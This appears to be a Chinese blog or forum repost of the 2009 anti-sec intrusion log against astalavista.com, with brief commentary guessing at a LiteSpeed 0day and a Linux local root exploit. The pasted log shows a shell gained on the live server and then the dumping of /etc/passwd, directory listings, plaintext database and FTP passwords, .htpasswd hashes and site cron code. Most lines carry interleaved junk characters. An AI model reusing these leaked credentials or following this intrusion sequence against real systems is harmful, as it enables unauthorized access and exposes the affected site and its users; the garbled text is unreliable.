里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
1 ]9 q4 L8 T6 Q9 r) `( g! q; s. G" C# Q% U. J$ ~! z" I
[root@front3 ~]# curl -I litespeedtech.com7 c9 o, U; Z' h( Q' E+ b' ?
HTTP/1.1 200 OK/ i2 ]1 {1 F1 h6 F, t
Date: Fri, 05 Jun 2009 22:54:51 GMT
# z1 C( M8 B# O+ l4 R9 T0 rServer: LiteSpeed
7 s A5 J ?/ E/ K$ Y4 {3 q2 \- z* _
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
- e7 B3 o1 w; A) V9 g5 A
5 i4 c y# m6 Q+ U7 G# h有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
. @* o& B7 I7 L4 g
9 B" W) ], k3 H# F/ o6 w! a/ y9 K+ H# G- y6 F
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ : L# c- y& s( S- \$ B
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \. O( U& \ V0 S9 V8 [- @/ K& p2 U
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \' a k, @4 \- O% a; H
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
9 @! c; k; h6 [ \/ \/ \/ \/ \/ \/ \/" w% A7 g* ?8 s6 n9 W" t. I
The Hacking & Security Community
- V9 Q. x# A; {1 B9 K% _- s% M[+] Founded in 1997 by a hacker computer enthusiast
5 m1 @0 j& ^$ L& I3 H8 e[-] Exposed in 2009 by anti-sec group5 X4 S, Q3 i2 `$ w/ y
7 Y1 i' _6 A% j/ J' R3 t- A/ }From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:- |$ B" f/ I9 G- ^. \4 D$ V+ E5 e/ Z
>> 03. Who’s behind the site?
! w. T2 n; `9 p: u9 }' r7 i>>
, }" Y. f5 d* X6 D+ @>> A team of security and IT professionals, and a countless number of contributors from all over the world.
7 a# z5 U K( e, k4 f3 T
, W0 f. G) b$ f9 B# C# m>> 05. Is it true that the site is visited by script-kiddies and warez fans only?7 w2 U5 O& S" B# f3 b
>>+ m2 m# T6 }; X! G9 O& ~. C/ ?; d
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
- o7 b& g) v5 nmilitary institutions.
* B2 Y* w: l; h3 a2 m4 U" Z& U>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.2 c4 ~5 R1 Q. s) |" a) @; {( f
r" C7 m2 D2 p& q9 e
Why has Astalavista been targeted?
$ m0 z4 M1 H- s7 f+ g
+ l7 a$ v# j# QOther than the fact that they are not doing any of this for the “community” but/ O, F, x% l1 G; C8 s
for the money, they spread exploits for kids, claim to be a security community. I9 r4 E3 u0 b7 G$ S, b. S3 J- O
(with no real sense of security on their own servers), and they charge you $6.660 r: F L, }+ f; Q2 j5 M
per months to access a dead forum with a directory filled with public releases* Y4 P2 s. _/ l/ _& C- C8 Q2 y) H# Q
and outdated / broken services.
( |$ t2 h' g8 \8 x0 p( Y ^9 b
3 t; D0 w' h3 h0 FWe wanted to see how good that “team of security and IT professionals” really is.0 f3 s: q; U! N$ G3 N4 I
/ s0 _- Y6 A O7 a4 J
Let’s begin.
/ {$ L/ W3 T( `, C) @' H4 R l
! `. S4 i6 _) t3 d! |anti-sec:~# ./g0tshell astalavista.com -p 80+ U" Q3 V J* B w
[+] Connecting to astalavista.com:809 i' k" }" i+ i
[+] Grabbing banner…1 @" n- P7 X7 t6 p* R* X/ P T
LiteSpeed: i9 F. y* p2 W$ I" i% }
[+] Injecting shellcode…
/ m: t; _; i1 D. M& n: i[-] Wait for it
3 G6 B4 W4 m$ \/ j; |& T2 {* r8 C$ s6 b" i* j/ w9 L
[~] We g0tshell
4 |( [; A, ]9 x$ Funame -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux1 u# ?) d+ i4 f
ID: uid=100(apache) gid=500(apache) groups=500(apache)
3 v$ Z: I: g6 f9 { M- V+ Z: W5 t% s" p2 M/ I8 e, }# I
sh-3.2$ cat /etc/passwd) B& r+ M4 A# }# B
root:x:0:0:root:/root:/bin/bash0 w) h# n7 E4 I) C% u( a
bin:x:1:1:bin:/bin:/sbin/nologin
( X3 ^9 p) V, _4 j1 o+ Hdaemon:x:2:2:daemon:/sbin:/sbin/nologin1 c! u6 O7 t# u7 n
adm:x:3:4:adm:/var/adm:/sbin/nologin) ^" `- u! P4 u* z1 B( l5 J
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
2 {7 a% O2 e3 Esync:x:5:0:sync:/sbin:/bin/sync3 ~" p6 X. A" j1 s
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- ?, d) ?0 A1 S, t* Xhalt:x:7:0:halt:/sbin:/sbin/halt
% ~' c& p3 _6 ]6 N+ I8 ?. c6 dmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
. J3 H+ G) t8 ~! P7 W& bnews:x:9:13:news:/etc/news:# q! |1 z5 i8 N. s, U
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin3 |; G2 @1 l/ J- t6 ^- y
operator:x:11:0 perator:/root:/sbin/nologin
) B" g$ k/ J7 A* U7 ^games:x:12:100:games:/usr/games:/sbin/nologin* K9 K- N; b8 T. d* e$ }+ q
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin7 N2 F' k6 k) ]( {9 z' N- B/ Z
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin3 ~/ P# \8 l- ^6 a1 Y
nobody:x:99:99:Nobody:/:/sbin/nologin. I2 z: [# ~8 O- H+ @$ ?, X! r# Z
rpm:x:37:37::/var/lib/rpm:/sbin/nologin+ w) f0 r4 e5 O/ ]7 @0 j
dbus:x:81:81:System message bus:/:/sbin/nologin
1 c0 V( R5 B) Q2 h9 r7 Wnscd:x:28:28:NSCD Daemon:/:/sbin/nologin2 G3 j/ q9 t( Z1 t5 l
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
* P! }1 y& Q4 @- s7 f5 Zsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
" H0 L8 k% Q3 P% Pvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin# I; d1 U' S4 v! Y' H4 `6 g
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin+ k; F ]" [/ X C, r. j8 u8 \
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin+ g$ _" C% x2 {" ^; ?) j
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
! S3 v- a: K7 a0 Y+ s% Rnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin* T8 j$ l$ k: i9 e* I) V
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
. P1 Y. x4 S! q8 T/ {pcap:x:77:77::/var/arpwatch:/sbin/nologin
. j, x' l6 }" l) L: W9 [1 gnamed:x:25:25:Named:/var/named:/sbin/nologin
1 j% i9 w3 m: E0 U0 }$ Dapache:x:100:500::/var/www:/bin/false
' G& r8 H! X% I+ T9 V! Udiradmin:x:101:101::/usr/local/directadmin:/bin/bash
0 L+ X; e% l' U0 n% |( q, E' P0 }mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
: V5 @; n, k; m9 l- ?9 u ]" ywebapps:x:500:501::/var/www/html:/bin/bash
, U5 i" m# q s8 p Zmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
: I4 V- E2 j# y% W2 e6 madmin:x:501:502::/home/admin:/bin/bash
, Z; L# Z* G, `) b2 Qjon:x:502:503::/home/jon:/bin/bash2 B. w# N2 K8 \& j/ o
com:x:503:504::/home/com:/bin/bash* L! Z j4 r) n2 q
ntp:x:38:38::/etc/ntp:/sbin/nologin
) A9 z# M! {: bais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin4 L* ^- S9 Y% Q7 N0 p. g- |
astanet:x:504:505::/home/astanet:/bin/bash
2 ^$ i' ]+ `$ A6 w P1 Lavahi:x:70:70:Avahi daemon:/:/sbin/nologin- _ q+ K) m ~$ q4 _+ L
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin% `4 e# J! n' E& X
' c: F- M' T" Y }# e* F
sh-3.2$ cat /etc/hosts j% d, h' e$ T; x3 ]$ P8 b; I
# Do not remove the following line, or various programs
3 t# z4 n9 b+ Y" E9 x; ?: Q# that require network functionality will fail.5 }2 |" t& h; z* w6 H+ m ^. w
127.0.0.1 localhost.localdomain localhost
* T w+ A3 r/ ~ |. s6 Z5 [::1 localhost6.localdomain6 localhost61 I6 e9 u" ?" F" h
80.74.154.172 asta1.astalavistaserver.com
' Q, h, a/ X3 A! M' r9 L& Q+ ~6 @" G. y- F# A* A! J2 P4 I
sh-3.2$ pwd2 y# w2 x" b2 z$ [; {5 c& `
/home/com/public_html2 Q% u- [ k( D1 }5 T* I1 ]4 C
5 ^9 {) O. }1 n8 }& q
sh-3.2$ ls -la& A Q+ b5 P* h7 O' [
total 18460" ?* @% h. P/ O/ n$ [5 _
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
2 Q# @; k7 A1 c/ ^ H% w5 O. n ]drwx–x–x 11 com com 4096 Jun 25 2008 ..
+ [5 z7 ]3 }. \ \; Tdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin$ C' `- I5 f5 g) [
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
' ]; k6 Z5 v- |+ r$ P; K! U: udrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
* j; C2 V6 L" C4 Q6 |: Gdrwxrwxrwx 2 com com 4096 May 19 00:50 config+ T. ~3 H, f5 `2 i/ e0 [
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core+ n/ m' c% s( V+ @5 n
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules# H0 `+ l% V; {+ W7 \) \
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
! k9 Q# H9 s s/ {9 e" i2 o0 Vdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo% z7 E/ Q8 {. C" ^5 Y+ t6 ?8 F
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__+ \9 A3 X3 u% O8 ~5 h
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php- W5 _' x+ w8 D- k2 x8 `# P: f1 L
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
! Y6 x7 W p+ {8 Z" m. M" Edrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
3 d3 C o1 X; O9 M% M1 ]-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
) n2 t1 E& c7 M$ g) @+ ndrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed$ i" S _4 `- e$ e) G- j
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess/ ? O* b0 Q* d2 c- s: O0 i& T
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
6 T9 ?* W' [6 `: Z) W/ i" v# b0 N-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak* j$ a1 }/ ^% L; R% c( ^
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
* b- e( }* I [% C$ O3 ndrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
& `5 b' L: q( X-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
( m6 T* w: u) b( n1 Ddrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer# m9 k; _0 \% G d9 [
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang. }: X! I+ G4 c K1 C
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
! K; ^+ D2 c' f1 P( K* [drwxrwxrwx 12 com com 4096 Jun 2 07:47 media9 ~ a6 q. a4 T0 `* q b
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
; q) v3 S* q5 [# \drwxr-xr-x 34 com com 4096 May 28 16:30 modules
+ y9 i* A6 d/ D& c& w/ j" ^6 Zdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
; y2 e: _6 U: s' }( K& }drwxrwxr-x 22 com com 4096 May 28 17:06 _new
6 z7 _ b% q& p/ Q: J& ?drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
8 t1 C; T' ]. j& m! y1 v* R3 Tdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy. _! I: B2 S# S
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy3 t3 y, `/ x `6 H
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
4 @" n3 `& E5 ?& V( P; g1 Y-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
3 Y% B6 O) W* |6 S& f-rw-r–r– 1 com com 223 Mar 30 15:32 test.php7 l# R1 ? A! l$ u, p2 g
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes% i9 K( M8 e% G Z0 c( v0 v
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
. r% x1 j$ W$ \% t: B& tdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
6 ]5 ?0 w* r" d- R, A1 R# n, [; l& i" _: T$ v( A9 G4 x7 k
sh-3.2$ head -20 index.php) N2 \( u' A* W% X' u4 z8 ]
<?php
2 _3 b A0 A& } T/ E, |) p1 S+ O
/**
# l8 h' x2 H# Z8 V* }* The main page for the CMS+ w2 c, {1 p& `, b
* @copyright CONTREXX CMS - COMVATION AG
^( w7 g a* \- _6 O* @author Comvation Development Team
5 D# {* I6 Y& \) O. K. c* @version v1.0.9.10.1 stable" F) ~9 x d/ e& w
* @package contrexx7 e% i \+ i" h& _% w
* @subpackage core
# E% k% t9 T, S- t* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
3 `, _$ k. m) t( N! S, i* @since v0.0.0.0
$ K; ^( ` x# c l& N) v8 t* @todo Capitalize all class names in project) r( W# R r' M/ O
* @uses /config/configuration.php
O7 S# n+ O! j, o8 \6 h5 e* r* @uses /config/settings.php
7 l3 }( \7 O a) s- d2 V* @uses /config/version.php( Y0 ^% D' o. L, h! e! Y
* @uses /core/API.php( f/ ?3 _6 X- \9 w! o
* @uses /core_modules/cache/index.class.php
2 Y5 o. r; {$ k! ?: x# Q0 N* @uses /core/error.class.php
" Z* Q; K5 x q8 E. b( I7 o* @uses /core_modules/banner/index.class.php$ j: n( U5 S s" i
* @uses /core_modules/contact/index.class.php0 Z/ J6 p: E" p" b) c0 D/ M# {$ H/ D: ^
3 a0 _( C0 {0 z* Y) G) P1 E1 G: _sh-3.2$ cd config/: A5 s* J0 F1 }* B/ v. x, H# k/ H, F
sh-3.2$ ls -la/ m; m/ y! T+ ~8 J* I' N
total 32
8 A/ Z1 a% g+ P2 j9 |% Kdrwxrwxrwx 2 com com 4096 May 19 00:50 .3 {; Y) G# O# X) U$ v
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..# g4 P' }- g& y9 L' [7 I7 s! X
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
" l B$ _- W, [/ q# v1 X5 n5 T-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php2 X# U S# D0 I F+ ^2 V( ^5 `
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php8 m* E U3 ?8 @
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php2 I7 l% y. Z- W t" [
- q1 C1 P" W t9 qsh-3.2$ cat configuration.php; O; e% S3 a9 u8 }6 z
[snip]
3 V' }) H, I& L7 c) H$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
+ L0 g! k& J4 c3 Q+ ]* T0 ~; V$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
$ l- T" N9 Y" K; x$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix3 ^1 D! w o( ^% N
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
7 Y& U- e3 @/ Q7 R6 M$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password: ^5 ]5 d# M2 Z
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
. Y+ z8 T- k% ~; c$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)* L0 h2 @6 U" i+ O1 |+ a" e
[snip]6 I* m+ ?9 o3 |) y& s
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
2 S# [- i! G" Y# f/ [) v$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode9 f1 I9 S8 H+ O' u" V' L3 M" K& B
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
% P) O c/ |4 D. f5 V$_FTPCONFIG['port'] = 21; // Ftp remote port& ^: d1 f& K; o1 ^0 y
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
! Y) E( ?( R/ N9 w$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
. ]( U8 g s8 U5 R! j4 K( H: X" V$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms# J" t; O2 W- p4 u) ?6 M
/ t t3 d6 ~4 G" ^sh-3.2$ cd ..
5 Z+ }( \ A& Ysh-3.2$ cd dvd/
* e$ Z+ |) `/ jsh-3.2$ ls -la* Z1 F9 _7 m7 h7 Y7 O# B
total 2913780
! s: F0 ]- ?/ U4 d% J! v5 {. udrwxr-xr-x 2 com com 4096 Sep 9 2008 .' I- A% x( Y1 P/ n5 d
drwxr-xr-x 30 com apache 4096 May 28 17:06 ../ v, i. Y. l# n3 ?% a
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar ~, x5 ^7 e! f$ U& x' D# T/ ^
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
4 p' Z7 [7 x( U$ g3 m* p% z-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar+ `, E0 {3 U3 n, s9 Y5 r/ u
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess' t3 a; I8 B% @
2 {# Q5 ~0 g R" Z, ]8 b" b: ?- w+ Rsh-3.2$ cat .htaccess
" _6 e* S' j0 R9 ^3 H6 O' j, {authType Basic' N$ ~( d% U: m; V+ r
authName DVD7 {$ \3 A! z# ?" \
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
- ^1 w& }! V; S- Yrequire valid-user
$ q) f- {7 _# x- g
- C- c1 j( Z' }8 g4 s$ J2 S msh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd1 A( ]7 |5 o. _6 ?0 F$ n2 L& l9 |
DVDdownload:CRD8cuY6.MPT6
" ^# o% z: A- }. U0 R7 UDVDdownload2:CR8a36.wluFMg
t; u' l+ C" G j2 t
" j7 a) s- E7 m" wsh-3.2$ cat test.php! u4 k1 ~ k0 b0 {+ s/ P
<?php- c. Q. E$ \0 @3 P) J5 I
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
4 c) a( V8 ~2 T$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
! ]) U l2 L6 y- B; m; c' s( Uecho $url;
0 U ~5 M! ^1 J?>9 u6 ~5 }+ ?8 a* Y( _, G3 M, [
$ y/ y7 Y1 ` r7 B3 nsh-3.2$ cd modifications/ X( E! ]3 G/ h$ h
sh-3.2$ ls -la& J' M( {$ c* G: R$ m+ _5 {
total 32
$ i/ z# m& [ H0 vdrwxr-xr-x 8 com com 4096 May 11 12:48 .+ l0 j$ u2 n' \( ]
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
1 \, P+ P2 B }2 P* t8 j. Rdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng( S! { }8 t* H+ j0 D. ]% C
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
1 }3 T' _6 Y4 K- W- _; h% j; bdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools% g. Z" @- q* D0 h x% _2 j |% g
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc" `( ^' I( s7 {7 W, |2 ^
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search7 p+ b: k6 K% P7 g. j& `4 @
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
% f2 t$ ^6 m! }# P% O1 [! B& g" [7 K; ]9 v( W" [* b; p% t7 g" z
sh-3.2$ ls -R
( a) ^( L! T7 M1 E' f.:
7 l& A" a6 n3 Q8 `+ s, wcom_avtng cronjobs onlinetools pjirc search _tmp
0 }$ U$ K, _9 Z3 u7 P7 M0 V9 e/ A' B* {+ l$ M+ t/ O
./com_avtng:! ~4 W* z& M: s( @5 |
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
5 E; m" c, G2 {, ^
- P5 h8 e8 Y( i" B! s* G./com_avtng/scripts:
5 `- v/ q3 X! l2 Z7 ~7 ?/ Tpopunder.js) v2 |! g) O( N$ k2 \
9 _. L. N& Z3 }
./cronjobs:
$ r5 ~1 T+ _/ z. E1 kexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp9 L9 B! c5 W. w7 I
" e5 ?) H$ }' k) @9 `
./cronjobs/tmp:! K+ H) ]$ P. s, l2 V' r
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv9 u8 L9 W3 I+ @" ~. W
8 [* E2 [3 k% m./onlinetools:- k$ M6 U. [' y. Q
index.php
' l- @ p2 @+ F3 o8 }; Z! [: s8 w* c$ T) m/ `1 B* x. Y8 o
./pjirc:* V) C5 K! e& R
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
2 k* D" ~/ `# `' \AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt. ^8 k2 `: h! D0 a; x
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
( r! Z* j6 q5 N$ Q$ l7 P6 M: w" k0 @3 b) P
./pjirc/img:6 ?. \$ u, Z) G9 H& Z& @& n% P
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif& M- b [0 X. G c
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
+ E+ G& @$ i- {' Cverre-eau.gif
: T& Z0 s% r& t* z) Qargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif , a% m; p; K: }) f2 O) ]1 [5 A1 N
verre-vin.gif
0 y! w; D% z" {ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif6 n5 d/ Y; L+ g
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
) v( f2 f0 q4 j% ], Z; q! b' H" O8 y/ W' s$ m# k, H
./pjirc/snd:4 E, V$ l( t g+ I
bell2.au ding.au% P b' [' f4 k5 b
0 }' m; ~& d1 e9 _6 ?( d/ G+ C./search:
# [, M) Y% E. p2 l4 ^4 }- rsearchEngines.php search.php3 H' g' ?" N- j: L
$ _% \/ L, K& Y& b- }5 L, v. }' a./_tmp:
7 {7 l6 D- J6 a' @+ e9 q% udefaultPorts.php defaultPorts.txt/ |3 X7 w% g% f
* r; M3 }+ I; H2 W5 Bsh-3.2$ cd cronjobs/0 N4 K' p/ l! B( \
sh-3.2$ cat exploits.php' j" a/ ]6 y* c% _$ V
[snip]* d4 \" v5 ?! I7 J: ?3 y% E9 i
$categories = array();
, P2 ^1 p4 l# B- B$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
' D& T& v; Y9 u4 Z" ?0 m9 U7 }$expolits = file($milw0rmFile);: L$ \# L: G. U( e1 v5 f$ ]
$comExploits = array();/ h8 c L I7 P+ V5 S
[snip] R) ]9 [) `+ w/ j
// manage data2 z2 A y+ X# E: C8 q
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640/ m" [+ N0 h* O+ D9 B* ~) ^( p$ p
, L8 Q: y4 u6 W5 z% j, y // get path and title
$ U5 [2 u( g6 g1 r# C- d# z/ i $expolits[$x] = trim($expolits[$x]);
+ C# r+ f% ]- Q+ G4 ^7 @' [ $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
4 M( H+ W! \& l) c M/ e2 j $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);& Q- k, `, u$ Q7 \9 g
; W. I3 S: f7 _
// check if file exists+ ]5 d% @$ E G6 n2 Q& J/ f
if (file_exists($path)) {9 q7 w+ X- P: [( N2 W
. V" X- g! d! g5 u2 O. D9 ^ $text = file_get_contents($path);6 g5 W& b( w: X3 u$ A$ y. x
# W) s. \- e4 u! p% l2 L; L9 R" | // get content and date% P8 j0 ]! R; z; }" s) L
//$text = htmlspecialchars($text, ENT_QUOTES);
0 f; T5 g$ H* a9 y- ~. H $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
# @: S* `/ `: ^8 I0 L T9 y if ($tmptext != ”) {
4 Q: F3 T w% K7 P5 B $text = $tmptext;
/ `4 B4 g0 f5 r! y- X1 y } else {0 M9 O2 w. ^9 G) y# w
$text = addslashes(htmlentities($text, ENT_QUOTES));
; K( k/ w; _, N/ R }
+ n( f3 M1 a+ U( Y, t $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
0 k0 t- [' A8 G4 S $tmp = explode('-', $date);! n( t: L5 p* j) e- ^# \. Z
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0])); q1 c3 \& v$ D- q
$cat = getCategory ($path);0 s5 O8 W% h$ O
$ext = pathinfo(basename($path));
% n9 `9 Q8 r' D9 r+ M5 N $ext = $ext['extension']; Z/ x% `3 O) F, Q( H8 E8 x9 S
$qStr = ”! g* b/ o9 }" O
SELECT `id`8 C% E9 T1 J$ W% M9 n
FROM `contrexx_module_exploits`( R0 w' l$ Q2 k' C1 j7 ~/ Q% P5 o9 ~( N% m
WHERE `title` = ‘” . $title . “‘9 E2 Z1 C0 X/ w
AND `date` = ‘” . $date . “‘" M9 G- A0 Q+ ~" C+ ^' f
“;" e& J; z- m$ C p
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;5 W+ e: D. v" l. G- v9 [6 y g7 z
$q = $_objDB->query($qStr);3 h6 \8 d0 u Z) B( i! Q
; e k& O! B9 }
if ($q->numRows() == 0) {3 A' P& z$ t: i5 _$ G, p( X) O. J8 D
: d3 w& x+ z. b- M/ v' v
// prepare array- E- S4 n1 \" q Y
$comExploits[$x]['date'] = $date;
/ w( w) V# Q1 w* s5 F! h. r $comExploits[$x]['title'] = $title;9 o. V" O$ @4 U( K
$comExploits[$x]['author'] = ‘milw0rm’;- W$ i4 b, \6 T# M% I9 W6 d1 Y
$comExploits[$x]['text'] = $text;0 |* _* X* W; }1 K. U3 R
$comExploits[$x]['source'] = $ext;
. R( e4 r: @" l+ [5 k' _ $comExploits[$x]['url1'] = ”;' \: a; b' |/ T1 C3 [4 F" h
$comExploits[$x]['url2'] = ”;- o I7 a; [: L/ w& j5 O4 B! [
$comExploits[$x]['catid'] = $cat;; ]8 h ~4 R& a; B
$comExploits[$x]['lang'] = ‘2′;
9 j: v- {* W1 S# @/ y9 F$ |' b& V $comExploits[$x]['userid'] = ‘12′;+ t M6 g/ A4 O0 J2 P! V, D. t$ t0 A
$comExploits[$x]['startdate'] = ‘0000-00-00′;
% r5 Y/ x0 H6 D7 z/ G# a% v9 ]( o $comExploits[$x]['enddate'] = ‘0000-00-00′;3 E# C M6 Y+ S5 g1 u
$comExploits[$x]['status'] = ‘1′;
5 x2 @; ~( M( A% H j: F7 Q $comExploits[$x]['changelog'] = $date;
! E% j; v E- l1 e
- ?6 O" P: z8 t/ {. ] }
; W( e( Z( t8 q6 a: H& x9 ^1 o0 g* O[snip]
3 g& U( [) F% n( M; Y: f $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
